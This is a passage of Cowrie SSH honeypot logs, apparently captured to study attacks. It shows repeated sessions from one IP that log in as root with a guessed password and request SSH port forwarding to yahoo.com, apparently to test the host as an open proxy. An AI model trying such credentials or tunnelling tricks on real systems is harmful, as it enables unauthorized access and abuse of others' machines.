cm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:05.840090Z","src_ip":"213.209.150.239","session":"94586c2cac73"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:06.075249Z","src_ip":"213.209.150.239","session":"94586c2cac73"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":1637,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:1637","sensor":"my-vps","timestamp":"2025-08-26T00:59:06.123268Z","session":"94586c2cac73"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:06.170695Z","src_ip":"213.209.150.239","session":"94586c2cac73"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":31152,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:31152","sensor":"my-vps","timestamp":"2025-08-26T00:59:06.305583Z","session":"94586c2cac73"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:06.352788Z","src_ip":"213.209.150.239","session":"94586c2cac73"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:06.401721Z","src_ip":"213.209.150.239","session":"94586c2cac73"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2978,"dst_ip":"1.2.3.4","dst_port":22,"session":"9627cf5e52b1","protocol":"ssh","message":"New connection: 213.209.150.239:2978 (1.2.3.4:22) [session: 9627cf5e52b1]","sensor":"my-vps","timestamp":"2025-08-26T00:59:06.447826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:06.448982Z","src_ip":"213.209.150.239","session":"9627cf5e52b1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:06.496209Z","src_ip":"213.209.150.239","session":"9627cf5e52b1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:06.731485Z","src_ip":"213.209.150.239","session":"9627cf5e52b1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":21313,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:21313","sensor":"my-vps","timestamp":"2025-08-26T00:59:06.779685Z","session":"9627cf5e52b1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:06.826870Z","src_ip":"213.209.150.239","session":"9627cf5e52b1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":18709,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:18709","sensor":"my-vps","timestamp":"2025-08-26T00:59:06.961649Z","session":"9627cf5e52b1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:07.009601Z","src_ip":"213.209.150.239","session":"9627cf5e52b1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:07.057967Z","src_ip":"213.209.150.239","session":"9627cf5e52b1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3019,"dst_ip":"1.2.3.4","dst_port":22,"session":"523eb43dd60b","protocol":"ssh","message":"New connection: 213.209.150.239:3019 (1.2.3.4:22) [session: 523eb43dd60b]","sensor":"my-vps","timestamp":"2025-08-26T00:59:07.113500Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:07.114507Z","src_ip":"213.209.150.239","session":"523eb43dd60b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:07.171552Z","src_ip":"213.209.150.239","session":"523eb43dd60b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:07.454173Z","src_ip":"213.209.150.239","session":"523eb43dd60b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":982,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:982","sensor":"my-vps","timestamp":"2025-08-26T00:59:07.511967Z","session":"523eb43dd60b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:07.569161Z","src_ip":"213.209.150.239","session":"523eb43dd60b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":27085,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:27085","sensor":"my-vps","timestamp":"2025-08-26T00:59:07.722887Z","session":"523eb43dd60b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:07.779476Z","src_ip":"213.209.150.239","session":"523eb43dd60b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:07.836826Z","src_ip":"213.209.150.239","session":"523eb43dd60b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3075,"dst_ip":"1.2.3.4","dst_port":22,"session":"00afdc4f6b4e","protocol":"ssh","message":"New connection: 213.209.150.239:3075 (1.2.3.4:22) [session: 00afdc4f6b4e]","sensor":"my-vps","timestamp":"2025-08-26T00:59:07.882982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:07.884115Z","src_ip":"213.209.150.239","session":"00afdc4f6b4e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:07.931383Z","src_ip":"213.209.150.239","session":"00afdc4f6b4e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:08.167602Z","src_ip":"213.209.150.239","session":"00afdc4f6b4e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":28276,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:28276","sensor":"my-vps","timestamp":"2025-08-26T00:59:08.216390Z","session":"00afdc4f6b4e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:08.263565Z","src_ip":"213.209.150.239","session":"00afdc4f6b4e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":29626,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:29626","sensor":"my-vps","timestamp":"2025-08-26T00:59:08.401537Z","session":"00afdc4f6b4e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:08.448662Z","src_ip":"213.209.150.239","session":"00afdc4f6b4e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:08.496858Z","src_ip":"213.209.150.239","session":"00afdc4f6b4e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3115,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec815b2f75de","protocol":"ssh","message":"New connection: 213.209.150.239:3115 (1.2.3.4:22) [session: ec815b2f75de]","sensor":"my-vps","timestamp":"2025-08-26T00:59:08.543346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:08.552327Z","src_ip":"213.209.150.239","session":"ec815b2f75de"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:08.590830Z","src_ip":"213.209.150.239","session":"ec815b2f75de"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:08.826433Z","src_ip":"213.209.150.239","session":"ec815b2f75de"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":29229,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:29229","sensor":"my-vps","timestamp":"2025-08-26T00:59:08.874571Z","session":"ec815b2f75de"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:08.922245Z","src_ip":"213.209.150.239","session":"ec815b2f75de"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":1957,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:1957","sensor":"my-vps","timestamp":"2025-08-26T00:59:09.065734Z","session":"ec815b2f75de"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:09.113037Z","src_ip":"213.209.150.239","session":"ec815b2f75de"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:09.161515Z","src_ip":"213.209.150.239","session":"ec815b2f75de"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3163,"dst_ip":"1.2.3.4","dst_port":22,"session":"3532a6833fbb","protocol":"ssh","message":"New connection: 213.209.150.239:3163 (1.2.3.4:22) [session: 3532a6833fbb]","sensor":"my-vps","timestamp":"2025-08-26T00:59:09.217024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:09.226917Z","src_ip":"213.209.150.239","session":"3532a6833fbb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:09.274437Z","src_ip":"213.209.150.239","session":"3532a6833fbb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:09.557402Z","src_ip":"213.209.150.239","session":"3532a6833fbb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":18476,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:18476","sensor":"my-vps","timestamp":"2025-08-26T00:59:09.614919Z","session":"3532a6833fbb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:09.671658Z","src_ip":"213.209.150.239","session":"3532a6833fbb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":19249,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:19249","sensor":"my-vps","timestamp":"2025-08-26T00:59:09.826930Z","session":"3532a6833fbb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:09.883576Z","src_ip":"213.209.150.239","session":"3532a6833fbb"}
